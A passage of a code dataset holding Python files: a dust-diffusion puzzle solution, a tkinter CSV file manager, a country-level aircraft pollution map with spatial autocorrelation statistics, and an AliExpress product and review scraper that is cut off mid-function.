\n\nr, c, t = map(int, input().split())\ndust = [list(map(int, input().split())) for _ in range(r)]\ncleaner1, cleaner2 = -1, 0\n\n\n\ndef diffuse(): # diffusion step\n    global dust\n    tmp = [[0]*c for _ in range(r)]\n    for x in range(r):\n        for y in range(c):\n            if dust[x][y] >= 5:\n                diffusion = dust[x][y]//5\n                for dx, dy in (-1,0), (1,0), (0,1), (0,-1):\n                    xNew, yNew = x + dx, y + dy\n                    if 0<=xNew<=r-1 and 0<=yNew<=c-1 and dust[xNew][yNew] != -1:\n                        tmp[xNew][yNew] += diffusion\n                        dust[x][y] -= diffusion\n    for x in range(r):\n        for y in range(c):\n            dust[x][y] += tmp[x][y]\n\ndef purify():\n    # top to bottom - right to left - bottom to top - left to right\n    for x in range(cleaner1-2, -1, -1): # cleaner 1: top to bottom\n        dust[x+1][0] = dust[x][0]\n    for y in range(c-1): # cleaner 1: right to left\n        dust[0][y] = dust[0][y+1]\n    for x in range(cleaner1): # cleaner 1: bottom to top\n        dust[x][c-1] = dust[x+1][c-1]\n    for y in range(c-2, -1, -1): # cleaner 1: left to right, one cell at a time\n        dust[cleaner1][y+1] = dust[cleaner1][y]\n    dust[cleaner1][1] = 0\n    for x in range(cleaner2+1, r-1):\n        dust[x][0] = dust[x+1][0]\n    for y in range(c-1):\n        dust[r-1][y] = dust[r-1][y+1]\n    for x in range(r-2, cleaner2-1, -1):\n        dust[x+1][c-1] = dust[x][c-1]\n    for y in range(c-2, -1, -1):\n        dust[cleaner2][y+1] = dust[cleaner2][y]\n    dust[cleaner2][1] = 0\n\ndef solve():\n    for _ in range(t):\n        diffuse()\n        purify()\n    print(sum(map(sum, dust))+2) # +2 compensates for the two cleaner cells stored as -1\n\nfor x in range(r):\n    for y in range(c):\n        if dust[x][y] == -1:\n            if cleaner1 == -1:\n                cleaner1 = x\n            else:\n                cleaner2 = x\nsolve()\n\n\n","sub_path":"BeakjoonOJ_Solved/17144.py","file_name":"17144.py","file_ext":"py","file_size_in_byte":3247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
{"seq_id":"375402701","text":"#!/usr/bin/python3.2\n\n\n\nimport tkinter, os\nfrom tkinter import *\nfrom tkinter.filedialog import askopenfilename, asksaveasfile # needed for the Open/Save dialogs below\n\nmain = tkinter.Tk()\n\n####################################################### Window parameters\n\nmain.geometry(\"800x600+300+0\")\n\n####################################################### Menu bar \n\nmenubar = tkinter.Menu(main)\n\n# Quit the program\ndef quit():\n    \n    global main\n    main.destroy()\n    \n# Open a file (one that is not in the list)\ndef op():\n\n    fenetre = Tk()\n    filename = askopenfilename(title=\"Ouvrir vos mesures\",filetypes=[('CSV files','.csv')])\n    fichier = open(filename, \"r\")\n    content = fichier.read() # read the file before closing it ('content' was never assigned)\n    fichier.close()\n\n    Label(fenetre, text=content).pack(padx=10, pady=10)\n    fenetre.mainloop()\n\n# Save the changes\ndef sa():\n    \n    filename = asksaveasfile(title=\"Sauvegarder\", defaultextension='.csv')\n\n# Create a new .csv file\ndef ne():\n    def newconf():\n        # create the file named in the entry field (it was hard-coded to 'entree.csv')\n        file = open(entree.get(), 'a')\n        file.close()\n        fenetre.quit()\n    \n    fenetre=Tk()\n    \n    value = StringVar() \n    value.set(\"Nouveau\"'.csv')\n    entree = Entry(fenetre, width=30, textvariable=value) # link the default name to the entry\n    entree.pack()\n    \n    annuler=Button(fenetre, text=\"Annuler\", command=fenetre.quit)\n    annuler.pack(side=LEFT, padx=5, pady=5)\n    annuler.pack()\n\n    confirme=Button(fenetre, text=\"Confirmer\", command=newconf)\n    confirme.pack(side=RIGHT, padx=5, pady=5)\n    confirme.pack()\n\n    fenetre.mainloop()\n    \n    \n    #print(\"Nouvelles mesures\")\n\n# add the available functions to the \"Fichier\" (File) menu\nfilemenu = tkinter.Menu(menubar, bg='ghost white', tearoff=0)\nfilemenu.add_command(label=\"Open\", command=op) #Open\nfilemenu.add_command(label=\"Save\", command=sa) #Save\nfilemenu.add_command(label=\"New\", command=ne) #New\nfilemenu.add_separator() #Separator\nfilemenu.add_command(label=\"Exit\", command=quit) #Exit\nmenubar.add_cascade(label=\"Fichier\", menu=filemenu) 
# \"Fichier\" menu\n\nmain.config(menu=menubar)\n\n\n################################################### File selection menu \n\nlistbox = tkinter.Listbox(main, bg='ghost white',height=750,width=595)\nlistbox.pack()\n\n# List title\nlistbox.insert(tkinter.END, \"Mesures:\")\n\n# Directory holding the measurement files\n#mesurefichier = os.listdir('U:\\\\Python\\\\SIN\\\\mesures')\nmesurefichier = os.listdir('G:\\\\Dev\\SIN\\\\SINproject\\\\mesures')\n\n# Keep only .csv files and display only the part before the dot\nfor item in mesurefichier:\n    if \".csv\" in item:\n        listbox.insert(tkinter.END, item.split('.')[0])\n\n\n    \n\n\n################################################### End of interface \n\nmain.mainloop()\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
{"seq_id":"447364434","text":"from collections import OrderedDict\nimport cartopy.io.shapereader as shpreader\nfrom shapely import geometry\nimport xarray as xr\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom descartes import PolygonPatch\nfrom pprint import PrettyPrinter\nfrom pyproj import Geod, Transformer\nimport json\n\n\"\"\"\nShows a map with colour coding for different statistics relating to aircraft emissions and ground pollution due to\naircraft. The available statistics are:\n - BC emissions of aircraft summed over a specified altitude range\n - BC ground pollution due to aircraft summed over 21 days (January or July)\n - Ratio of BC ground pollution to BC emissions due to aviation\nIn order to obtain a single value for the country, several methods of combining the per-grid-cell data are supported:\n - Area average, which sums the data over the entire area of the country and then divides by its surface area\n - Median, which takes the median of all values in the country\nThe user can select between summer and winter using a boolean and define the altitude ranges over which emissions are\nconsidered (e.g. to separate cruise and LTO emissions). In addition to that, outlier countries can be specified to make\nlocal differences more visible. Countries that cause a division by zero during the calculation (e.g. if the emissions\nare zero in the ratio statistic) will automatically be removed. All removed countries are shown in black.\n\nIn addition to a map displaying the data per country, the program outputs three indicators of spatial autocorrelation:\nGeary's C and global and local Moran's I. Global statistics are printed as a single value, while local statistics are\nshown in a map.\n\n@author Jakob\n\"\"\"\n
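\n# Illustrative note (not part of the original pipeline): conceptually, the ratio statistic\n# boils each country down to one number,\n#   ratio[c] = ground_pollution[c] / aviation_emissions[c]\n# and countries whose emissions are zero are dropped before plotting.\n\n# TODO: Find neater solution for options\n# TODO: Add colour bar\n# Always keep in mind that the data for countries such as Russia and Algeria are only representative of the part of that\n# country which lies within the data region (and not of the entire country)\n# Also note that the pollution data is not influenced by areas outside of the data region (so the data does not show\n# pollution caused in Western Europe by cruise emissions in the US)\n# The numbers for emissions are often VERY small, in the order of 10^-14 to 10^-15. Be aware of machine precision\n# AvEmMasses.nc4 can also be used instead of AvEmFluxes.nc4, but it does not contain any information about differences\n# in altitudes. 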
It merely contains the sum of all emissions over a certain grid cell\n\nsummer = False # used to select between pollution data for January and July\n\n# if set to False, the program looks for a file that already contains the pollution and emission data. If such a file\n# does not exist for the selected settings, it still recalculates the data\nrecalculate_data = False\n\n# the altitude levels over which emissions will be considered. Check Altitude_levels.txt for conversion to km\n# level 8: 1 km altitude, level 14: 2 km altitude\nemission_levels = slice(0, 8)\n\n# the value for these countries will be set to zero. That is useful if some countries have such high or low values that\n# they make it impossible to see any differences between the other countries\noutliers = [\"Iraq\", \"Israel\", \"Latvia\"]\n\n# available statistics for plotting\nPLOT_RATIO = \"Ground Pollution/Emission Ratio\"\nPLOT_EMISSIONS = \"Emissions\"\nPLOT_POLLUTION = \"Ground Pollution\"\n\nmode = PLOT_RATIO\n\n# supported ways of summarising data in a country\nMETHOD_AVG = \"Area average\"\nMETHOD_MEDIAN = \"Median\"\n\nmethod = METHOD_AVG\n\ncountry_file = json.load(open(\"countries.json\"))\n\n# data from 2016 for 1:20 million scale world map. More coarse or detailed maps are available. The coordinate\n# system is with longitude and latitude in degrees\nshape_file = 'Shapefiles/CNTR_RG_20M_2016_4326.shp'\n\n# NetCDF files containing pollution with aircraft on and off, respectively\npoll_on_filename = \"Soot.24h.{}.ON.nc4\".format(\"JUL\" if summer else \"JAN\")\npoll_off_filename = \"Soot.24h.{}.OFF.nc4\".format(\"JUL\" if summer else \"JAN\")\n\nem_filename = \"AvEmFluxes.nc4\" # NetCDF file containing aircraft emissions\nem_multiplier = 10E5 # factor to increase values of emission data and avoid rounding errors due to machine precision\n\ncolormap = \"coolwarm\" # colour map\nremoved_colour = (0, 0, 0, 1) # colour for removed countries\n\n\n# create a dictionary containing the polygons for all countries listed in \"interesting\". This function returns an\n# ordered dictionary with the format \"country_name: [[list of polygons that it is made up of], total area]\"\ndef create_country_polygons():\n frame = geometry.Polygon([(-30, 30), (50, 30), (50, 70), (-30, 70)]) # the geographic area for which we have data\n geod = Geod('+a=6378137 +f=0.0033528106647475126') # object used for conversion from degrees to km\n\n # read the shape file\n reader = shpreader.Reader(shape_file)\n\n # this is a generator, not a list. So you can only loop over it, not use indexing. But if necessary, it can be\n # converted using list( ).\n countries = reader.records()\n\n # the keys are country names (in English), and the value for each of them is a list with the polygons that the\n # country shape is made up of\n country_poly = {}\n\n # fill the country_poly\n for country in countries:\n # the .split( ) part in this statement is necessary because for some reason the names have \\x00\\x00\\x00... added\n # to them. 
If you don't remove that, the statement doesn't find any of them in the \"interesting\" list\n country_name = country.attributes['NAME_ENGL'].split(\"\\x00\")[0]\n if country_name in country_file:\n # create empty list which will be filled with the polygons of the country, and set total area to 0\n country_poly[country_name] = [[], 0]\n multipolygon = country.geometry.geoms # a multipolygon can consist of several disjoint polygons\n for polygon in multipolygon: # each of these is a shapely polygon\n # get the portion of the polygon that's inside the data frame. This may result in shapely polygons or\n # multipolygons being created (e.g. if the original polygon is split in half)\n inside_frame = polygon.intersection(frame)\n\n # function used to add a polygon to the dictionary\n def add_region(region):\n country_poly[country_name][0].append(region)\n # add the area of the country which lies inside of the frame (in km^2)\n country_poly[country_name][1] += abs(geod.geometry_area_perimeter(region)[0] / 1E6)\n\n if isinstance(inside_frame, geometry.Polygon):\n add_region(inside_frame)\n\n elif isinstance(inside_frame, geometry.MultiPolygon):\n for region in inside_frame: # loop over all the polygons that make up the multipolygon\n add_region(region)\n\n # eliminate any countries that don't have any polygons inside of the data frame\n if not country_poly[country_name][0]:\n del country_poly[country_name]\n\n # return an ordered dictionary (countries in alphabetical order)\n return OrderedDict(sorted(country_poly.items(), key=lambda t: t[0]))\n\n\n# find the name of the country in which the coordinates (lon, lat) lie. Return None if it does not lie inside any\n# of the countries listed in \"countries\". \"countries\" has the same format as the return value of\n# create_country_polygons(), i.e. 
a dictionary with country names as keys and lists of polygons as values\ndef find_country_name(country_polygons, lon, lat):\n for name in country_polygons: # loop over all countries\n for region in country_polygons[name][0]: # loop over each polygon that the country is made of\n if region.contains(geometry.Point(lon, lat)): # check if the polygon contains the coordinates\n return name\n return None\n\n\n# find the ground level pollution (BC due to aircraft) and aircraft BC emission data for each country, and return it\n# in an ordered dictionary in the form \"country_name: [emission, pollution]\".\ndef find_poll_em_data(country_polygons):\n if not recalculate_data:\n try: # try and find a buffer file for the given settings\n poll_em_data = json.load(open(\"poll_em_buffer.json\"))\n\n # retrieve the relevant parameters that were used to generate the buffer file\n summer_saved = poll_em_data[\"summer\"]\n emission_levels_saved = poll_em_data[\"emission_levels\"]\n\n # if time of year and altitude ranges match\n if summer_saved == summer and emission_levels_saved[0] == emission_levels.start and \\\n emission_levels_saved[1] == emission_levels.stop:\n\n # remove the items that stored parameters, since they are not needed anymore\n del poll_em_data[\"summer\"]\n del poll_em_data[\"emission_levels\"]\n\n # check for any missing countries in the file\n requested_keys = set(country_polygons.keys())\n returned_keys = set(poll_em_data.keys())\n unavailable = list(requested_keys.difference(returned_keys))\n\n print(\"Retrieved data from existing file\")\n\n # return data, along with the names of all missing countries\n return OrderedDict(sorted(poll_em_data.items(), key=lambda t: t[0])), unavailable # continue here\n\n else: # if the settings in the buffer file don't match the required settings\n print(\"Parameters in buffer file don't match user input. Recalculating data...\")\n\n except (FileNotFoundError, KeyError): # in case there is no buffer file\n print(\"No valid file found, recalculating data...\")\n\n # anything from here onwards is only executed in case the data needs to be recalculated\n\n DS = xr.open_dataset(em_filename)\n da_em = DS.BC * em_multiplier # select only the BC (black carbon) emissions since it is inert\n\n DS_on = xr.open_dataset(poll_on_filename)\n DS_off = xr.open_dataset(poll_off_filename)\n\n # subtract pollution data without aircraft from pollution with aircraft to retrieve the pollution caused by\n # aircraft only. Also, only select BC\n da_poll = DS_on.AerMassBC - DS_off.AerMassBC\n\n poll_em_data = {}\n lon_axis = da_em.coords['lon'].values # the longitude values of the data grid\n lat_axis = da_em.coords['lat'].values # the latitude values of the data grid\n\n # this block fills poll_em_data in the format \"country_name: [total_emissions, time_averaged_pollution]\"\n for lon in lon_axis:\n for lat in lat_axis: # loop over all cells in the data grid\n country = find_country_name(country_polygons, lon, lat) # find the country the cell lies in\n if country is not None:\n if country not in poll_em_data:\n # if this is the first time the country is detected, set emission and pollution counters to 0\n poll_em_data[country] = [[], []]\n # select the correct values from the simulation data and add it to the lists. Sum over all parameters\n # which are not explicitly specified (e.g. 
time or altitude)\n poll_em_data[country][0].append(float(np.sum(da_em.sel(lon=lon, lat=lat)\n .sel(lev=emission_levels).values))) # select altitude range\n poll_em_data[country][1].append(float(np.sum(da_poll.sel(lon=lon, lat=lat)\n .sel(lev=1, method='nearest').values)))\n\n # write the data into a buffer file, to speed up loading next time the program is run\n with open(\"poll_em_buffer.json\", \"w\") as outfile:\n data_saved = poll_em_data.copy() # make a copy so that the original remains unchanged\n\n # add items describing the settings used to generate the data\n data_saved[\"summer\"] = summer\n data_saved[\"emission_levels\"] = [emission_levels.start, emission_levels.stop]\n\n # write the file\n json.dump(data_saved, outfile, indent=4)\n\n # check for any missing countries in the file\n requested_keys = set(country_polygons.keys())\n returned_keys = set(poll_em_data.keys())\n unavailable = list(requested_keys.difference(returned_keys))\n\n # return data, along with the names of all missing countries\n return OrderedDict(sorted(poll_em_data.items(), key=lambda t: t[0])), unavailable\n\n\n# integrate the data over the country surfaces using the chosen method, and combine emission and pollution data\n# according to the selected mode. Returns an ordered dict with \"country_name: value\". Also returns any countries that\n# were removed\ndef process_data(country_polygons, raw_data):\n processed_data = raw_data.copy() # make a copy of the data to not modify the original\n\n # summarise list of data for each country in one single value, using the selected method\n if method == METHOD_AVG:\n for country in raw_data:\n processed_data[country] = np.sum(raw_data[country], axis=1)\n elif method == METHOD_MEDIAN:\n for country in raw_data:\n processed_data[country] = np.median(raw_data[country], axis=1)\n else:\n print(\"Error: Invalid averaging method:\", method)\n\n # list of all countries that were removed, either if they lead to divisions by zero or because they were labelled\n # as outliers. This list does not contain the countries for which we do not have any data at all\n removed_countries = []\n\n # post-process the data according to the selected statistic to get the format \"country_name: value\"\n if mode == PLOT_RATIO:\n for country in raw_data:\n # avoid division by zero and check that the country isn't labeled as an outlier\n if processed_data[country][0] != 0 and not any([outlier in country for outlier in outliers]):\n # divide pollution by emissions\n processed_data[country] = processed_data[country][1] / processed_data[country][0]\n else: # remove the country from the data set if it is an outlier or if it has no emissions\n removed_countries.append(country)\n del processed_data[country]\n elif mode == PLOT_EMISSIONS or mode == PLOT_POLLUTION:\n for country in raw_data:\n if not any([outlier in country for outlier in outliers]):\n # divide pollution or emissions (depending on the mode) by the area of the corresponding country\n processed_data[country] = processed_data[country][0 if mode == PLOT_EMISSIONS else 1] / \\\n country_polygons[country][1]\n else: # remove the country from the data set if it is an outlier\n removed_countries.append(country)\n del processed_data[country]\n else:\n print(\"Error: Invalid mode:\", mode)\n\n return OrderedDict(sorted(processed_data.items(), key=lambda t: t[0])), removed_countries\n\n\n# returns a matrix that gives the spatial correlation between countries (based on the inverse of the distance between\n# them). 
Used for spatial autocorrelation measurement\ndef spatial_matrix(country_polygons):\n    transformer = Transformer.from_crs(\"EPSG:4326\", \"EPSG:3035\") # used to transform longitude and latitude to metres\n    centres = [] # list for the centres of all countries\n    for country in country_polygons:\n        # the centre of the country is the weighted average of the centres of its sub-regions\n        centre_lon_lat = sum([np.array(region.centroid) * region.area for region in country_polygons[country][0]]) / \\\n            sum([region.area for region in country_polygons[country][0]])\n        centres.append(transformer.transform(centre_lon_lat[0], centre_lon_lat[1])) # transform centre to metres\n\n    centres = np.array(centres) / 1E3 # convert centre coordinates from metres to kilometres\n    polygon_values = list(country_polygons.values()) # values of the polygon list (used to get area of the country)\n    w = np.zeros((len(country_polygons), len(country_polygons))) # empty matrix for weights\n    # loop over all rows of the matrix, each corresponding to a country\n    for i in range(len(w)):\n        # characteristic radius of the country (radius of a circle with the same area)\n        char_rad = np.sqrt(polygon_values[i][1] / np.pi)\n\n        distances = np.linalg.norm(centres[i] - centres, axis=1) # distances from this country to all others\n        distances[i] = 1 # avoid division by zero (distance from the country to itself is 0)\n\n        # The weight of each country is the inverse of its distance, multiplied by the current country's characteristic\n        # radius. This scaling is done because the influence of a big country at its borders is just as big as the\n        # influence of a small country at its borders. If we didn't use this factor, the weight of the neighbouring\n        # countries of a big country would be smaller, since they are further away from its centre.\n        w[i] = 1 / distances * char_rad\n\n        w[i, i] = 0 # set the weight of the current country w.r.t. itself to 0\n\n    return w\n\n\n# return the global Moran's I for the data set. A positive value indicates that values are clustered, i.e. similar\n# values are close to each other on the map (positive spatial autocorrelation). A negative value means that similar\n# values are far apart (negative spatial autocorrelation), and zero means that values are randomly distributed\ndef morans_i_global(country_polygons, data):\n    w = spatial_matrix(country_polygons)\n\n    data_values = list(data.values())\n    mean = np.mean(data_values)\n    s = 0\n    for i in range(len(w)):\n        for j in range(len(w[i])):\n            s += w[i, j] * (data_values[i] - mean) * (data_values[j] - mean)\n\n    return len(data_values) / np.sum(w) * s / np.var(data_values)\n\n\n# return Geary's C for the data set. A value between 0 and 1 indicates positive spatial autocorrelation,\n# a value larger than 1 shows negative spatial autocorrelation. More sensitive to local scales than Moran's I\ndef gearys_c(country_polygons, data):\n    w = spatial_matrix(country_polygons)\n\n    data_values = list(data.values())\n    s = 0\n    for i in range(len(w)):\n        for j in range(len(w[i])):\n            s += w[i, j] * (data_values[i] - data_values[j]) ** 2\n\n    return (len(data_values) - 1) * s / (2 * np.sum(w) * np.var(data_values))\n\n
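\n# Formula note (added for reference; this mirrors the two functions above, which use\n# numpy's population variance var(x) = sum_i (x_i - mean)^2 / n):\n#   Moran's I = n / sum_ij(w_ij) * [sum_ij w_ij * (x_i - mean) * (x_j - mean)] / var(x)\n#   Geary's C = (n - 1) * sum_ij w_ij * (x_i - x_j)^2 / (2 * sum_ij(w_ij) * var(x))\n\n\n# return the local Moran's I for each country in the data set. 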
A positive value indicates that the country's value is\n# similar to its neighbours, while a negative value shows that it is an outlier compared to its surroundings.\ndef morans_i_local(country_polygons, data):\n w = spatial_matrix(country_polygons)\n data_values = list(data.values())\n mean = np.mean(data_values)\n i_local = []\n for i in range(len(w)):\n var = np.mean(np.delete(data_values, i))\n s = 0\n for j in range(len(w[i])):\n s += w[i, j] * (data_values[j] - mean)\n i_local.append((len(w) - 1) / var * (data_values[i] - mean) * s / np.sum(w[i]))\n\n country_names = list(country_polygons.keys())\n return OrderedDict({country_names[i]: i_local[i] for i in range(len(w))})\n\n\n# functions to map the values for each country between 0 and 1\ndef lin_mapping(val, min_val, max_val):\n return (val - min_val) / (max_val - min_val)\n\n\ndef sqrt_mapping(val, min_val, max_val):\n return np.sqrt((val - min_val) / (max_val - min_val))\n\n\ndef log_mapping(val, min_val, max_val):\n return np.log((val - min_val) / (max_val - min_val) + 1) / np.log(2)\n\n\n# show map with colour coding for the pollution and/or emission data\ndef plot(country_polygons, processed_data, add_title=\"\", add_info=\"\", show_removed=False, mapping=lin_mapping):\n ax = plt.gca() # get the axes of the current figure\n ax.set_title(mode + add_title + \"\\n\\nConsidered chemical: BC | Time frame for pollution: \" +\n (\"July\" if summer else \"January\") + \" 2005 | Altitude levels for emission: \" +\n str(emission_levels.start) + \" to \" + str(emission_levels.stop) + \" | Averaging method: \" + method)\n\n countries_with_poly = set(country_polygons.keys())\n countries_with_data = set(processed_data.keys())\n removed_countries = list(countries_with_poly.difference(countries_with_data))\n if show_removed:\n ax.set_xlabel(\"Removed countries: \" + str(removed_countries) + \"\\n\" + add_info)\n else:\n ax.set_xlabel(add_info)\n\n # only display the region for which we have data\n ax.set_xlim([-30, 50])\n ax.set_ylim([30, 70])\n\n # find maximum and minimum value to scale the colour coding\n min_val = min(processed_data.values())\n max_val = max(processed_data.values())\n\n # loop over all countries for which we have found a pollution and emission data. These are not necessarily the\n # same countries as the ones in the polygon dictionary, since some countries (e.g. Vatican City) are too small\n # to contain any data (the grid is too coarse). These countries will then not be plotted\n for name in processed_data:\n value = processed_data[name] # retrieve the value for this country\n\n # select the colour based on the value. 
Nonlinear mappings can be used to make differences more apparent\n colour = plt.get_cmap(colormap)(mapping(value, min_val, max_val))\n for region in country_polygons[name][0]: # loop over all regions that the country consists of\n ax.plot(*region.exterior.xy, alpha=0) # plot the borders of the polygon\n ax.add_patch(PolygonPatch(region, facecolor=colour)) # fill the polygon with colour\n\n for name in removed_countries:\n for region in country_polygons[name][0]: # loop over all regions that the country consists of\n ax.plot(*region.exterior.xy, alpha=0) # plot the borders of the polygon\n ax.add_patch(PolygonPatch(region, facecolor=removed_colour)) # fill the polygon with colour\n\n # TODO: Add colour bar\n # gradient = mapping(np.linspace(min_val, max_val, 256), min_val, max_val)\n # gradient = np.vstack((gradient, gradient))\n # ax.imshow(gradient, aspect='auto', cmap=plt.get_cmap(colormap))\n\n\nprint(\"Creating country polygons...\")\ncountries = create_country_polygons()\ncountries_with_data = countries.copy() # the countries which can be used for analysis later on\n\nprint(\"Retrieving raw pollution and emission data...\")\nraw_data, unavailable = find_poll_em_data(countries)\nfor country in unavailable:\n del countries_with_data[country]\n\nprint(\"Processing the data...\")\nprocessed_data, removed_countries = process_data(countries, raw_data)\nfor country in removed_countries:\n del countries_with_data[country]\n\nprint(\"Performing spatial analysis...\")\nmoran_global = morans_i_global(countries_with_data, processed_data)\ngeary = gearys_c(countries_with_data, processed_data)\nmoran_local = morans_i_local(countries_with_data, processed_data)\n\nprint(\"Plotting the data...\")\nplot(countries, processed_data, mapping=sqrt_mapping)\n\nprint(\"Plotting the results of the spatial analysis...\")\nplt.figure()\nplot(countries, moran_local, add_title=\" (Local Moran's I)\",\n add_info=\"Global Moran's I: \" + str(moran_global) + \"\\nGeary's C: \" + str(geary))\n\nprint(\"Finished.\\n\")\n\npp = PrettyPrinter(indent=4)\nprint(\"============= RESULTS ==============\\n\")\n\nprint(\"These countries had no data available:\", unavailable)\nprint(\"These countries were removed:\", removed_countries)\nprint(\"Global Moran's I: \", moran_global)\nprint(\"Geary's C: \", geary)\nprint(\"Data:\")\npp.pprint(processed_data)\nprint(\"Local Moran's I:\")\npp.pprint(moran_local)\nplt.show()\n","sub_path":"Country Group/country_master.py","file_name":"country_master.py","file_ext":"py","file_size_in_byte":23745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"70945905","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Sep 20 16:42:12 2018\n\n@author: rebeccareitz\n\"\"\"\nfrom lxml import html\nimport requests\nimport pandas as pd\nimport numpy as np\nimport json\nfrom datetime import datetime\nfrom bs4 import BeautifulSoup\n\nfrom langdetect import detect\n\nimport pickle\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.linear_model import LogisticRegression\n\nimport os\n\n\ndef scrape_product_info(product_url):\n session_requests = requests.session()\n #login_url = \"https://login.aliexpress.com/\"\n #result = session_requests.get(login_url)\n #tree = html.fromstring(result.text)\n #authenticity_token = tree.xpath(\"//input[@name='_csrf_token']/@value\")\n \n #Load \n #path = 'data/AliExpressSecret.txt' # Path to the file that holds the keys\n #mode = 'r' # read mode--I'll only need to 
read the username and password from the file\n\n #keys = [] # The list where I'll store my username and password\n #with open(path, mode) as f: # Open the file\n # for line in f:\n # keys.append(line) # The first line is the username, and the second line is the password--add each of these\n # lines to the keys list\n \n #payload = {\n # 'loginID': keys[0].rstrip(),\n # 'password': keys[1].rstrip()\n # }\n #print(product_url)\n \n #login_result = session_requests.post(\n # login_url, \n # data = payload, \n # headers = dict(referer=login_url)\n # )\n \n result = session_requests.get(\n product_url,\n headers = dict(referer = product_url))\n print(result.ok)\n \n soup = BeautifulSoup(result.content, \"html.parser\")\n \n if soup.find('input', {'id': 'hid-product-id'})['value'] is not None:\n product_id = soup.find('input', {'id': 'hid-product-id'})['value']\n else:\n product_id = 1\n title = soup.find('h1', {'class': 'product-name'}).text\n price = float(soup.find('span', {'id': 'j-sku-price'}).text.split('-')[0])\n\n if soup.find('span', {'id': 'j-sku-discount-price'}):\n discount_price = float(soup.find('span', {'id': 'j-sku-discount-price'}).text.split('-')[0])\n else:\n discount_price = None\n\n properties = soup.findAll('li', {'class': 'property-item'})\n attrs_dict = {}\n for item in properties:\n name = item.find('span', {'class': 'propery-title'}).text[:-1]\n val = item.find('span', {'class': 'propery-des'}).text\n attrs_dict[name] = val\n description = json.dumps(attrs_dict)\n\n stars = float(soup.find('span', {'class': 'percent-num'}).text)\n votes = int(soup.find('span', {'itemprop': 'reviewCount'}).text)\n orders = int(soup.find('span', {'id': 'j-order-num'}).text.split()[0].replace(',', ''))\n wishlists = 0 # int(soup.find('span', {'id': 'j-wishlist-num'}).text.strip()[1:-1].split()[0])\n\n try:\n shipping_cost = soup.find('span', {'class': 'logistics-cost'}).text\n shipping_company = soup.find('span', {'id': 'j-shipping-company'}).text\n except Exception:\n shipping_cost = ''\n shipping_company = ''\n is_free_shipping = shipping_cost == 'Free Shipping'\n is_epacket = shipping_company == 'ePacket'\n\n primary_image_url = soup.find('div', {'id': 'magnifier'}).find('img')['src']\n\n store_id = soup.find('span', {'class': 'store-number'}).text.split('.')[-1]\n store_name = soup.find('span', {'class': 'shop-name'}).find('a').text\n store_start_date = soup.find('span', {'class': 'store-time'}).find('em').text\n store_start_date = datetime.strptime(store_start_date, '%b %d, %Y')\n\n if soup.find('span', {'class': 'rank-num'}):\n store_feedback_score = int(soup.find('span', {'class': 'rank-num'}).text)\n store_positive_feedback_rate = float(soup.find('span', {'class': 'positive-percent'}).text[:-1]) * 0.01\n else:\n store_feedback_score = -1\n store_positive_feedback_rate = -1\n\n try:\n cats = [item.text for item in soup.find('div', {'class': 'ui-breadcrumb'}).findAll('a')]\n category = '||'.join(cats)\n except Exception:\n category = ''\n\n row = {\n 'product_id': product_id,\n 'title': title,\n 'description': description,\n 'price': price,\n 'discount_price': discount_price,\n 'stars': stars,\n 'votes': votes,\n 'orders': orders,\n 'wishlists': wishlists,\n 'is_free_shipping': is_free_shipping,\n 'is_epacket': is_epacket,\n 'primary_image_url': primary_image_url,\n 'store_id': store_id,\n 'store_name': store_name,\n 'store_start_date': store_start_date,\n 'store_feedback_score': store_feedback_score,\n 'store_positive_feedback_rate': store_positive_feedback_rate,\n 'category': 
category,\n 'product_url': product_url\n }\n \n return row\n\ndef get_product_info(product_url):\n dirpath = os.getcwd()\n product_filename = os.path.join(dirpath,'Trust_Express_Site','data', 'all_saved_product_info.csv')\n print(os.listdir())\n print(product_filename)\n product_df = pd.read_csv(product_filename, index_col=False, low_memory=False)\n product_info = product_df.loc[product_df['product_url']==product_url]\n return product_info.iloc[0]\n\ndef find_english(product_reviews):\n lang_list = []\n for ind, row in product_reviews.iterrows():\n this_review = row['buyerfeedback']\n try:\n feedback_lang = detect(this_review)\n lang_dict = {\n 'feedback_lang':feedback_lang,\n 'ind':ind\n }\n except:\n continue\n lang_list.append(lang_dict)\n lang_df = pd.DataFrame(lang_list)\n product_reviews = product_reviews.join(lang_df.set_index('ind'))\n english_product_reviews = product_reviews.loc[product_reviews['feedback_lang']=='en']\n return english_product_reviews\n\ndef standardize_text(df, text_field):\n df[text_field] = df[text_field].str.replace(r\"http\\S+\", \"\")\n df[text_field] = df[text_field].str.replace(r\"http\", \"\")\n df[text_field] = df[text_field].str.replace(r\"@\\S+\", \"\")\n df[text_field] = df[text_field].str.replace(r\"[^A-Za-z0-9(),!?@\\'\\`\\\"\\_\\n]\", \" \")\n df[text_field] = df[text_field].str.replace(r\"@\", \"at\")\n df[text_field] = df[text_field].str.lower()\n return df\n\ndef find_helpful(english_product_reviews):\n \n english_product_reviews = standardize_text(english_product_reviews, 'buyerfeedback')\n \n dirpath = os.getcwd()\n tfidf_vectorizer_pkl_filename = os.path.join(dirpath,'Trust_Express_Site','models', 'count_vectorizer.pickle')\n tfidf_vectorizer_pkl = open(tfidf_vectorizer_pkl_filename, 'rb')\n tfidf_vectorizer = pickle.load(tfidf_vectorizer_pkl)\n X_tfidf = tfidf_vectorizer.transform(english_product_reviews['buyerfeedback'])\n \n clf_tfidf_pkl_filename = os.path.join(dirpath,'Trust_Express_Site','models', 'clf_SGD.pickle')\n clf_tfidf_pkl = open(clf_tfidf_pkl_filename, 'rb')\n clf_tfidf = pickle.load(clf_tfidf_pkl)\n y = clf_tfidf.predict_proba(X_tfidf)\n y_df = pd.DataFrame(y, columns = ['unhelp_prob','help_prob'], index = english_product_reviews.index.values) \n \n english_reviews_with_prob = pd.concat([english_product_reviews[:],y_df[:]],axis = 1)\n \n return english_reviews_with_prob\n\ndef extract_product_reviews(product_id, max_page=100):\n url_template = 'https://m.aliexpress.com/ajaxapi/EvaluationSearchAjax.do?type=all&index={}&pageSize=20&productId={}&country=US'\n initial_url = url_template.format(1, product_id)\n print(product_id)\n reviews = []\n\n s = requests.Session()\n\n resp = s.get(initial_url)\n if resp.status_code == 200:\n 